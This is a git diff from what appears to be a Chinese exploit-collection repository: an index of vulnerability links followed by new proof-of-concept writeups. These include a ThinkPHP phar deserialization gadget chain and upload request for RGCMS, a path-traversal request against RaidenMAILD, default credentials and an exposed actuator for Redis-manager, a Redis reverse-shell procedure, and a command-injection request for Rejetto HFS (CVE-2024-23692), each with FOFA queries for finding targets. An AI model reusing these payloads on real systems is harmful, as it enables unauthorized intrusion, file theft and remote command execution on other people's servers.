-- iDocView upload接口任意文件读取
-- Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)
+- [万户ezoffice wpsservlet任意文件上传漏洞](./万户OA/万户ezoffice%20wpsservlet任意文件上传漏洞.md)
+- [万户 ezOFFICE DocumentEdit.jsp SQL注入](./万户OA/万户%20ezOFFICE%20DocumentEdit.jsp%20SQL注入.md)
+- [用友 NC uapws wsdl XXE漏洞](./用友OA/用友%20NC%20uapws%20wsdl%20XXE漏洞.md)
+- [iDocView upload接口任意文件读取](./iDocView/iDocView%20upload接口任意文件读取.md)
+- [Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)](./WordPress/Wordpress%20Backup%20Migration%20plugin%20代码执行漏洞(CVE-2023-6553).md)
   
 ## 2023.12.14 新增漏洞
-- 泛微云桥 e-Bridge addTaste接口SQL注入漏洞
-- Tenda路由器账号密码泄露
-- 思福迪运维安全管理系统RCE漏洞
+- [泛微云桥 e-Bridge addTaste接口SQL注入漏洞](./泛微OA/泛微云桥%20e-Bridge%20addTaste接口SQL注入漏洞.md)
+- [Tenda路由器账号密码泄露](./Tenda/Tenda路由器账号密码泄露.md)
+- [思福迪运维安全管理系统RCE漏洞](./思福迪运维安全管理系统/思福迪运维安全管理系统RCE漏洞.md)
 
 ## 2023.12.11 新增漏洞
-- Apache Struts2 CVE-2023-50164
-- 蓝凌EKP前台授权绕过导致文件上传
-- 通达OA header身份认证绕过漏洞
+- [Apache Struts2 CVE-2023-50164](./Apache/Apache%20Struts2%20CVE-2023-50164.md)
+- [蓝凌EKP前台授权绕过导致文件上传](./蓝凌OA/蓝凌EKP前台授权绕过导致文件上传.md)
+- [通达OA header身份认证绕过漏洞](./通达OA/通达OA%20header身份认证绕过漏洞.md)
   
 ## 2023.12.08 新增漏洞
-- Dedecms v5.7.111前台tags.php SQL注入漏洞
-- 云时空社会化商业ERP任意文件上传
-- 奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞
+- [Dedecms v5.7.111前台tags.php SQL注入漏洞](./dede/Dedecms%20v5.7.111前台tags.php%20SQL注入漏洞.md)
+- [云时空社会化商业ERP任意文件上传](./云时空/云时空社会化商业ERP任意文件上传.md)
+- [奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞](./奥威亚视频云平台/奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞.md)
   
 ## 2023.12.07 新增漏洞
-- WeiPHP存在SQL注入漏洞
-- Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070
-- 多个防火墙产品RCE
-- 金蝶Apusic应用服务器任意文件上传
+- [WeiPHP存在SQL注入漏洞](./WeiPHP/WeiPHP存在SQL注入漏洞.md)
+- [Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070](./Apache/Apache%20Ofbiz%20XML-RPC%20RCE漏洞-CVE-2023-49070.md)
+- [多个防火墙产品RCE](./防火墙产品/多个防火墙产品RCE.md)
+- [金蝶Apusic应用服务器任意文件上传](./金蝶/金蝶Apusic应用服务器任意文件上传.md)
 
 ## 2023.12.05 新增漏洞
-- 速达软件全系产品存在任意文件上传漏洞
-- 易思智能物流无人值守系统5.0存在任意文件上传漏洞
-- RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
+- [速达软件全系产品存在任意文件上传漏洞](./速达软件/速达软件全系产品存在任意文件上传漏洞.md)
+- [易思智能物流无人值守系统5.0存在任意文件上传漏洞](./易思智能物流无人值守系统/易思智能物流无人值守系统5.0存在任意文件上传漏洞.md)
+- [RuoYi4.6.0 SQL注入漏洞CVE-2023-49371](./RuoYi/RuoYi4.6.0%20SQL注入漏洞CVE-2023-49371.md)
 
 ## 2023.12.03 新增漏洞
-- 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞
+- [智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞](./智跃人力资源管理系统/智跃人力资源管理系统GenerateEntityFromTable.aspx%20SQL漏洞.md)
   
 ## 2023.11.30 新增漏洞
-- Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678
-- 红帆OA iorepsavexml.aspx 文件上传漏洞
+- [Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678](./Apache/Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md)
+- [红帆OA iorepsavexml.aspx 文件上传漏洞](./红帆OA/红帆OA%20iorepsavexml.aspx%20文件上传漏洞.md)
   
 ## 2023.11.29 新增漏洞
-- 网神防火墙 app_av_import_save文件上传漏洞
-- 大华智慧园区管理平台任意文件读取
-- 通达OA down.php接口存在未授权访问漏洞
+- [网神防火墙 app_av_import_save文件上传漏洞](./网神/网神防火墙%20app_av_import_save文件上传漏洞.md)
+- [大华智慧园区管理平台任意文件读取](./大华/大华智慧园区管理平台任意文件读取.md)
+- [通达OA down.php接口存在未授权访问漏洞](./通达OA/通达OA%20down.php接口存在未授权访问漏洞.md)
   
 ## 2023.11.28 新增漏洞
-- 新开普掌上校园服务管理平台service.action远程命令执行
-- 易宝OA ExecuteSqlForSingle SQL注入漏洞
-- 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞
-- 云匣子堡垒机fastjson漏洞
-- 海康威视运行管理中心fastjson漏洞
-- Array VPN任意文件读取漏洞
-- 万户OA-upload任意文件上传漏洞
+- [新开普掌上校园服务管理平台service.action远程命令执行](./新开普掌上校园服务管理平台/新开普掌上校园服务管理平台service.action远程命令执行.md)
+- [易宝OA ExecuteSqlForSingle SQL注入漏洞](./易宝OA/易宝OA%20ExecuteSqlForSingle%20SQL注入漏洞.md)
+- [大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞](./大华/大华智慧园区综合管理平台%20deleteFtp%20远程命令执行漏洞.md)
+- [云匣子堡垒机fastjson漏洞](./云匣子堡垒机/云匣子堡垒机fastjson漏洞.md)
+- [海康威视运行管理中心fastjson漏洞](./海康威视/海康威视运行管理中心fastjson漏洞.md)
+- [Array VPN任意文件读取漏洞](./Array%20VPN/Array%20VPN任意文件读取漏洞.md)
+- [万户OA-upload任意文件上传漏洞](./万户OA/万户OA-upload任意文件上传漏洞.md)
   
 ## 2023.11.26 新增漏洞
-- 用友NC word.docx任意文件读取漏洞
-- 用友NC的download文件存在任意文件读取漏洞
-- 泛微e-cology9_SQL注入-CNVD-2023-12632
-- TOTOLINK A3700R命令执行漏洞CVE-2023-46574
-- Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214)
+- [用友NC word.docx任意文件读取漏洞](./用友OA/用友NC%20word.docx任意文件读取漏洞.md)
+- [用友NC的download文件存在任意文件读取漏洞](./用友OA/用友NC的download文件存在任意文件读取漏洞.md)
+- [泛微e-cology9_SQL注入-CNVD-2023-12632](./泛微OA/泛微e-cology9_SQL注入-CNVD-2023-12632.md)
+- [TOTOLINK A3700R命令执行漏洞CVE-2023-46574](./路由器/TOTOLINK%20A3700R命令执行漏洞CVE-2023-46574.md)
+- [Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214)](./Splunk%20Enterprise/Splunk-Enterprise远程代码执行漏洞(CVE-2023-46214).md)
 
 ## 2023.11.24 新增漏洞
-- 华为Auth-Http Serve任意文件读取
-- 昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071)
-- 好视通视频会议系统 toDownload.do接口 任意文件读取漏洞
+- [华为Auth-Http Serve任意文件读取](./华为Auth-Http%20Serve/华为Auth-Http%20Serve任意文件读取.md)
+- [昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071)](./昂捷ERP/昂捷ERP%20WebService接口%20SQL注入漏洞(QVD-2023-45071).md)
+- [好视通视频会议系统 toDownload.do接口 任意文件读取漏洞](./好视通视频会议系统/好视通视频会议系统%20toDownload.do接口%20任意文件读取漏洞.md)
   
 ## 2023.11.23 新增漏洞
-- 大华智能物联ICC综合管理平台readpic任意文件读取漏洞
-- Apache-Submarine-SQL注入漏洞CVE-2023-37924
-- H3C网络管理系统任意文件读取漏洞
-- 广州图创图书馆集群管理系统存在未授权访问
-- I Doc View任意文件上传漏洞
-- 致远OA M3 Server 反序列化漏洞
-- pyLoad远程代码执行漏洞
+- [大华智能物联ICC综合管理平台readpic任意文件读取漏洞](./大华/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md)
+- [Apache-Submarine-SQL注入漏洞CVE-2023-37924](./Apache/Apache-Submarine-SQL注入漏洞CVE-2023-37924.md)
+- [H3C网络管理系统任意文件读取漏洞](./H3C/H3C网络管理系统任意文件读取漏洞.md)
+- [广州图创图书馆集群管理系统存在未授权访问](./广州图创图书馆集群管理系统/广州图创图书馆集群管理系统存在未授权访问.md)
+- [I Doc View任意文件上传漏洞](./iDocView/I%20Doc%20View任意文件上传漏洞.md)
+- [致远OA M3 Server 反序列化漏洞](./致远OA/致远OA%20M3%20Server%20反序列化漏洞.md)
+- [pyLoad远程代码执行漏洞](./pyLoad/pyLoad远程代码执行漏洞.md)
   
 ## 2023.11.20 新增漏洞
-- 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞
-- 浙大恩特客户资源管理系统 文件上传和sql注入漏洞
-- 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露
-- Appium Desktop CVE-2023-2479漏洞
+- [金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞](./金蝶/金蝶OA-EAS系统%20uploadLogo.action%20任意文件上传漏洞.md)
+- [浙大恩特客户资源管理系统 文件上传和sql注入漏洞](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统%20文件上传和sql注入漏洞.md)
+- [锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露](./锐捷/锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md)
+- [Appium Desktop CVE-2023-2479漏洞](./Appium%20Desktop/Appium%20Desktop%20CVE-2023-2479漏洞.md)
   
 ## 2023.11.19 新增漏洞
-- 用友U8-cloud RegisterServlet接口存在SQL注入漏洞
-- SysAid远程命令执行漏洞（CVE-2023-47246）
-- CVE-2023-4357-Chrome-XXE漏洞
+- [用友U8-cloud RegisterServlet接口存在SQL注入漏洞](./用友OA/用友U8-cloud%20RegisterServlet接口存在SQL注入漏洞.md)
+- [SysAid远程命令执行漏洞（CVE-2023-47246）](./SysAid/SysAid远程命令执行漏洞（CVE-2023-47246）.md)
+- [CVE-2023-4357-Chrome-XXE漏洞](./Chrome/CVE-2023-4357-Chrome-XXE漏洞.md)
   
 ## 2023.11.17 新增漏洞
-- 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞
+- [金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞](./金蝶/金蝶OA云星空%20ScpSupRegHandler%20任意文件上传漏洞.md)
   
 ## 2023.11.16 新增漏洞
-- 迪普DPTech VPN 任意文件读取
-- 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞
-- 通达OA get_datas.php前台sql注入
+- [迪普DPTech VPN 任意文件读取](./迪普/迪普DPTech%20VPN%20任意文件读取.md)
+- [蓝凌OAsysUiComponent 文件存在任意文件上传漏洞](./蓝凌OA/蓝凌OAsysUiComponent%20文件存在任意文件上传漏洞.md)
+- [通达OA get_datas.php前台sql注入](./通达OA/通达OA%20get_datas.php前台sql注入.md)
 
 ## 2023.11.09 新增漏洞
-- IP-guard WebServer 远程命令执行漏洞
+- [IP-guard WebServer 远程命令执行漏洞](./IP%20guard%20WebServer/IP-guard%20WebServer%20远程命令执行漏洞.md)
 
 ## 2023.11.08 新增漏洞
-- 奇安信360天擎getsimilarlistSQL注入漏洞
-- 致远M1 usertokenservice 反序列化RCE漏洞
+- [奇安信360天擎getsimilarlistSQL注入漏洞](./天擎/奇安信360天擎getsimilarlistSQL注入漏洞.md)
+- [致远M1 usertokenservice 反序列化RCE漏洞](./致远OA/致远M1%20usertokenservice%20反序列化RCE漏洞.md)
 
 
 ## 2023.11.07 新增漏洞
-- jshERP信息泄露漏洞
-- 致远OA wpsAssistServlet任意文件读取漏洞
-- 金和OA任意文件读取漏洞
+- [jshERP信息泄露漏洞](./jshERP/jshERP信息泄露漏洞.md)
+- [致远OA wpsAssistServlet任意文件读取漏洞](./致远OA/致远OA%20wpsAssistServlet任意文件读取漏洞.md)
+- [金和OA任意文件读取漏洞](./金和OA/金和OA任意文件读取漏洞.md)
   
 ## 2023.11.03 新增漏洞
-- XXL-JOB默认accessToken身份绕过漏洞
-- Confluence身份认证绕过(CVE-2023-22518)
+- [XXL-JOB默认accessToken身份绕过漏洞](./XXL-JOB/XXL-JOB默认accessToken身份绕过漏洞.md)
+- [Confluence身份认证绕过(CVE-2023-22518)](./Confluence/Confluence身份认证绕过(CVE-2023-22518).md)
   
 ## 2023.10.31 新增漏洞
-- F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)
-- Cisco IOS XE CVE-2023-20198权限提升漏洞
+- [F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)](./F5-BIG-IP/F5%20BIG-IP%20远程代码执行漏洞(CVE-2023-46747).md)
+- [Cisco IOS XE CVE-2023-20198权限提升漏洞](./Cisco/Cisco%20IOS%20XE%20CVE-2023-20198权限提升漏洞.md)
 
 ## 2023.10.30 新增漏洞
-- JAVA Public CMS 后台RCE漏洞
+- [JAVA Public CMS 后台RCE漏洞](./Public%20CMS/JAVA%20Public%20CMS%20后台RCE漏洞.md)
   
 ## 2023.10.26 新增漏洞
-- Apache ActiveMQ远程命令执行漏洞
+- [Apache ActiveMQ远程命令执行漏洞](./Apache/Apache%20ActiveMQ远程命令执行漏洞.md)
 
   
 ## 2023.10.25 新增漏洞
-- 用友U8-Cloud upload任意文件上传漏洞
-- [安美数字酒店宽带运营系统SQL注入漏洞](安美数字酒店宽带运营系统SQL注入漏洞.md)
-- [泛微E-MobileServer远程命令执行漏洞](泛微E-MobileServer远程命令执行漏洞.md)
-- 蓝凌OA treexml.tmpl 远程命令执行漏洞
+- [用友U8-Cloud upload任意文件上传漏洞](./用友OA/用友U8-Cloud%20upload任意文件上传漏洞.md)
+- [安美数字酒店宽带运营系统SQL注入漏洞](安美数字酒店宽带运营系统/安美数字酒店宽带运营系统SQL注入漏洞.md)
+- [泛微E-MobileServer远程命令执行漏洞](./泛微OA/泛微E-MobileServer远程命令执行漏洞.md)
+- [蓝凌OA treexml.tmpl 远程命令执行漏洞](./蓝凌OA/蓝凌OA%20treexml.tmpl%20远程命令执行漏洞.md)
   
 ## 2023.10.21 新增漏洞
-- [海康威视综合安防管理平台信息泄露](海康威视综合安防管理平台信息泄露.md)
+- [海康威视综合安防管理平台信息泄露](./海康威视/海康威视综合安防管理平台信息泄露.md)
 
 ## 2023.10.20 新增漏洞
-- [蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞](蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md)
-- 用友NC-Cloud uploadChunk 任意文件上传漏洞
--  深信服下一代防火墙NGAF RCE漏洞
--  金蝶EAS myUploadFile任意文件上传
--  用友 GRP U8 license_check.jsp 存在SQL注入
+- [蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞](./蓝凌OA/蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md)
+- [用友NC-Cloud uploadChunk 任意文件上传漏洞](./用友OA/用友NC-Cloud%20uploadChunk%20任意文件上传漏洞.md)
+- [ 深信服下一代防火墙NGAF RCE漏洞](./深信服/深信服下一代防火墙NGAF%20RCE漏洞.md)
+- [ 金蝶EAS myUploadFile任意文件上传](./金蝶/金蝶EAS%20myUploadFile任意文件上传.md)
+- [ 用友 GRP U8 license_check.jsp 存在SQL注入](./用友OA/用友%20GRP%20U8%20license_check.jsp%20存在SQL注入.md)
 
 ## 2023.10.18 新增漏洞
-- 360天擎 - 未授权与sql注入
-- 深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE
-- 深信服下一代防火墙NGAF任意文件读取漏洞
-- Confluence 未授权提权访问漏洞
-- 泛微e-office 未授权访问
-- 金山终端安全系统V9.0 SQL注入漏洞
+- [360天擎 - 未授权与sql注入](./天擎/360天擎%20-%20未授权与sql注入.md)
+- [深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE](./深信服/深信服SANGFOR终端检测响应平台%20-%20任意用户免密登录,前台RCE.md)
+- [深信服下一代防火墙NGAF任意文件读取漏洞](./深信服/深信服下一代防火墙NGAF任意文件读取漏洞.md)
+- [Confluence 未授权提权访问漏洞](./Confluence/Confluence%20未授权提权访问漏洞.md)
+- [泛微e-office 未授权访问](./泛微OA/泛微e-office%20未授权访问.md)
+- [金山终端安全系统V9.0 SQL注入漏洞](./金山/金山终端安全系统V9.0%20SQL注入漏洞.md)
 
 ## 2023.9.26 新增漏洞
-- JumpServer未授权访问漏洞 CVE-2023-42442
-- Craft CMS远程代码执行漏洞 CVE-2023-41892
-- WinRAR CVE-2023-38831 漏洞
-- 用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
+- [JumpServer未授权访问漏洞 CVE-2023-42442](./JumpServer/JumpServer未授权漏洞.md)
+- [Craft CMS远程代码执行漏洞 CVE-2023-41892](./Craft/Craft%20CMS远程代码执行漏洞CVE-2023-41892.md)
+- [WinRAR CVE-2023-38831 漏洞](./WinRAR/WinRAR%20CVE-2023-38831.md)
+- [用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞](./用友OA/用友%20GRP-U8%20bx_historyDataCheck.jsp%20SQL注入漏洞.md)
 
 ## 2023.9.22 新增漏洞
-- Joomla 未授权漏洞CVE-2023-23752
+- [Joomla 未授权漏洞CVE-2023-23752](./Joomla/Joomla%20未授权漏洞CVE-2023-23752.md)
   
 ## 2023.9.19 新增漏洞
-- smanga存在未授权远程代码执行漏洞 CVE-2023-36076
-- JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
+- [smanga存在未授权远程代码执行漏洞 CVE-2023-36076](./smanga/smanga存在未授权远程代码执行漏洞.md)
+- [JFinalCMS 任意文件读取漏洞(CVE-2023-41599)](./JFinalCMS/JFinalCMS%20任意文件读取漏洞(CVE-2023-41599).md)
 
 ## 2023.9.14 新增漏洞
-- 致远OA前台用户重置密码漏洞
-- Apache Spark命令执行漏洞（CVE-2023-32007）
+- [致远OA前台用户重置密码漏洞](./致远OA/致远前台任意用户密码修改.md)
+- [Apache Spark命令执行漏洞（CVE-2023-32007）](./Apache/Apache%20Spark命令执行漏洞（CVE-2023-32007）.md)
 
 ## 免责声明
 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。所涉及工具来自网络，安全性自测。
diff --git a/RGCMS2.0存在phar反序列化漏洞.md b/RGCMS2.0存在phar反序列化漏洞.md
new file mode 100644
index 0000000..0305dd1
--- /dev/null
+++ b/RGCMS2.0存在phar反序列化漏洞.md
@@ -0,0 +1,133 @@
+# RGCMS2.0存在phar反序列化漏洞
+
+**RGCMS存在反序列化漏洞，攻击者可以通过该漏洞执行任意命令。**
+
+## fofa
+
+```javascript
+"RGCMS"
+```
+
+## poc
+
+```javascript
+POST /admin.php/data/delbackup HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 212
+Origin: http://rgcms:81
+Connection: close
+Referer: http://rgcms:81/admin.php/data/backuplist
+Cookie: PHPSESSID=us9vfbgeh2i9c5kcp7h27ii8ns
+Priority: u=0
+
+title=20240820110529_rgcms.db&path=phar://upload/image/20240820/2057e04b4b2d528ed7726d233fc87191.png&children=&mtime=2024-08-20+11%3A05%3A29&size=1.09MB&type=file&ext=db&isReadable=true&isWritable=true&edit=false
+```
+
+**漏洞复现**
+
+生成phar文件
+
+```php
+<?php
+namespace think\process\pipes {
+    class Windows
+    {
+        private $files;
+        public function __construct($files)
+        {
+            $this->files = array($files);
+        }
+    }
+}
+
+namespace think\model\concern {
+    trait Conversion
+    {
+        protected $append = array("smi1e" => "1");
+    }
+
+    trait Attribute
+    {
+        private $data;
+        private $withAttr = array("smi1e" => "system");
+
+        public function get()
+        {
+            $this->data = array("smi1e" => "calc");
+        }
+    }
+}
+namespace think {
+    abstract class Model
+    {
+        use model\concern\Attribute;
+        use model\concern\Conversion;
+    }
+}
+
+namespace think\model{
+    use think\Model;
+    class Pivot extends Model
+    {
+        public function __construct()
+        {
+            $this->get();
+        }
+    }
+}
+
+namespace {
+
+    $conver = newthink\model\Pivot();
+    $a = new think\process\pipes\Windows($conver);
+
+
+    $phar = new Phar('hkey.phar');
+    $phar -> stopBuffering();
+    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
+    $phar -> addFromString('test.txt','test');
+    $phar -> setMetadata($a);
+    $phar -> stopBuffering();
+}
+?>
+```
+
+**把hkey.phar文件名修改为hkey.png**
+
+**安装时RGCMS时选择数据库类型为：Sqlite**
+
+![4e0412e97319c4cab7d8676d59484750](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633854.jpg)
+
+
+
+**上传恶意的png文件：**
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633107.jpeg)
+
+来到备份修复功能
+
+![9427ecd99f1abb35cff8de1089d5211b](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061633615.png)
+
+![89c3630e24a51314c2328e9d0bfcecf6](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634669.jpg)
+
+![90be81b23edef08235fbdec978300ad1](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634102.png)
+
+**将数据包中path参数修改为**
+
+**phar://upload/image/20240820/2057e04b4b2d528ed7726d233fc87191.png**
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502061634602.png)
+
+
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/WxffySGN33r-7ZJtD40BKA
\ No newline at end of file
diff --git a/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md b/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md
new file mode 100644
index 0000000..7d55c29
--- /dev/null
+++ b/RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞.md
@@ -0,0 +1,28 @@
+# RaidenMAILD邮件服务器v.4.9.4存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);"> </font>RaidenMAILD是一款稳定、安全、高性能的邮件服务器软件，适用于中小型企业、机构以及个人用户搭建自己的邮件系统。该产品 Raden MAILD Mail Server v.4.9.4及以前版本中存在任意文件读取漏洞，允许远程攻击者通过/webeditor/组件获取敏感信息。
+
+# 二、影响版本
++ RaidenMAILD<4.9.4
+
+# 三、资产测绘
++ fofa`RaidenMAILD Mail Server <= 4.9.4`
++ 特征
+
+![1714229722832-98ad3c87-4222-411f-87e2-5895a002cdd9.png](./img/cToKgwcRMUfI6HSw/1714229722832-98ad3c87-4222-411f-87e2-5895a002cdd9-041666.png)
+
+# 四、漏洞复现
+```plain
+GET /webeditor/../../../windows/win.ini HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Connection: close
+```
+
+![1714229752407-c112d773-a048-4c35-afd1-0c96c3a4f6fe.png](./img/cToKgwcRMUfI6HSw/1714229752407-c112d773-a048-4c35-afd1-0c96c3a4f6fe-619548.png)
+
+
+
+> 更新: 2024-04-28 16:17:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gyn1em2xgen6fhmc>
\ No newline at end of file
diff --git a/Redis-manager存在SpringBoot未授权漏洞.md b/Redis-manager存在SpringBoot未授权漏洞.md
new file mode 100644
index 0000000..cc0a70d
--- /dev/null
+++ b/Redis-manager存在SpringBoot未授权漏洞.md
@@ -0,0 +1,25 @@
+# Redis-manager存在SpringBoot未授权漏洞
+
+# 一、漏洞简介
+Redis-manager存在SpringBoot未授权漏洞
+
+# 二、影响版本
++ Redis-manager
+
+# 三、资产测绘
++ fofa`title="redis-manager"`
++ 特征
+
+![1722503666116-484bd9a1-c45d-446f-8822-043858923c84.png](./img/ozgJoW32TNP3H6_C/1722503666116-484bd9a1-c45d-446f-8822-043858923c84-582883.png)
+
+# 四、漏洞复现
+```java
+/actuator
+```
+
+![1722503902922-adc0c038-0bb7-4254-816f-07fdcb89dbca.png](./img/ozgJoW32TNP3H6_C/1722503902922-adc0c038-0bb7-4254-816f-07fdcb89dbca-559830.png)
+
+
+
+> 更新: 2024-08-12 17:15:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bd4ewn4tipkp4asb>
\ No newline at end of file
diff --git a/Redis-manager存在默认口令漏洞.md b/Redis-manager存在默认口令漏洞.md
new file mode 100644
index 0000000..310df57
--- /dev/null
+++ b/Redis-manager存在默认口令漏洞.md
@@ -0,0 +1,25 @@
+# Redis-manager存在默认口令漏洞
+
+# 一、漏洞简介
+Redis-manager存在默认口令漏洞
+
+# 二、影响版本
++ Redis-manager
+
+# 三、资产测绘
++ fofa`title="redis-manager"`
++ 特征
+
+![1722503666116-484bd9a1-c45d-446f-8822-043858923c84.png](./img/ZwxZi7OgyYvsLYp8/1722503666116-484bd9a1-c45d-446f-8822-043858923c84-127056.png)
+
+# 四、漏洞复现
+```java
+admin/admin
+```
+
+![1722503654485-c31e50f4-edf3-46b0-930a-1c9e57758b8f.png](./img/ZwxZi7OgyYvsLYp8/1722503654485-c31e50f4-edf3-46b0-930a-1c9e57758b8f-229985.png)
+
+
+
+> 更新: 2024-08-12 17:15:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kbs59gun554dkc0k>
\ No newline at end of file
diff --git a/Redis存在未授权访问导致的RCE.md b/Redis存在未授权访问导致的RCE.md
new file mode 100644
index 0000000..02c3216
--- /dev/null
+++ b/Redis存在未授权访问导致的RCE.md
@@ -0,0 +1,36 @@
+# Redis存在未授权访问导致的RCE
+
+# 一、漏洞描述
+redis是一个非常快速的，开源的，支持网络，可以基于内存，也可以持久化的日志型，非关系型的键值对数据库。并提供了多种语言的api。有java，c/c++,c#,php，JavaScript，perl，object-c，python，ruby，erlang等客户端，使用方便。Redis存在未授权访问导致的RCE
+
+# 二、影响版本
+Redis
+
+# 三、资产测绘
+```plain
+app="redis"
+```
+
+![1730008100396-b60c7ec9-97aa-491a-9229-cc41975bfbaa.png](./img/1fBdiLYyi01ByAzn/1730008100396-b60c7ec9-97aa-491a-9229-cc41975bfbaa-952279.png)
+
+# 三、漏洞复现
+![1730008135522-2752b193-04f5-44d4-87cc-e50cbe4683ac.png](./img/1fBdiLYyi01ByAzn/1730008135522-2752b193-04f5-44d4-87cc-e50cbe4683ac-462694.png)
+
+反弹shell使用脚本
+
+[RedisGetshell.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1732673083520-cd32abee-9703-4958-aa1c-02c3d6e94e7b.txt)
+
+```plain
+python RedisGetshell.py -H 127.0.0.1 -P 6379
+```
+
+选3，之后输入自己vps地址，即可反弹shell
+
+![1730008351143-c3229d9a-105e-4908-be63-0acbd96e26d4.png](./img/1fBdiLYyi01ByAzn/1730008351143-c3229d9a-105e-4908-be63-0acbd96e26d4-139525.png)
+
+![1730008405363-cfa5d390-7a75-4ebd-b35d-8b44b0307856.png](./img/1fBdiLYyi01ByAzn/1730008405363-cfa5d390-7a75-4ebd-b35d-8b44b0307856-287531.png)
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hrg8q2mccg664x20>
\ No newline at end of file
diff --git a/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md b/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md
new file mode 100644
index 0000000..86393dd
--- /dev/null
+++ b/RejettoHTTP文件服务器search存在命令执行漏洞(CVE-2024-23692).md
@@ -0,0 +1,34 @@
+# Rejetto HTTP文件服务器search存在命令执行漏洞(CVE-2024-23692)
+
+# 一、漏洞简介
+Rejetto HTTP文件服务器是一款免费的、跨平台的、基于Java的轻量级HTTP文件服务器软件。它允许用户通过Web浏览器访问和管理文件，支持上传、下载、删除、重命名、创建目录等操作。  Rejetto HTTP文件服务器 search接口处存在RCE漏洞(CVE-2024-23692)，恶意攻击者可能利用此漏洞执行恶意命令，获取服务器敏感信息，最终可能导致服务器失陷。
+
+# 二、影响版本
++ Rejetto HTTP File Server <= 2.3m
+
+# 三、资产测绘
+```http
+app="HFS"
+```
+
++ 特征
+
+![1718116518836-b92544c4-a811-4dee-8285-756a066df0ce.png](./img/-gVG0vk06azCeMDZ/1718116518836-b92544c4-a811-4dee-8285-756a066df0ce-300730.png)
+
+# 四、漏洞复现
+```java
+GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
+Host:127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
+![1718116766397-856eb67d-c89a-4559-a5b4-662267245327.png](./img/-gVG0vk06azCeMDZ/1718116766397-856eb67d-c89a-4559-a5b4-662267245327-686273.png)
+
+
+
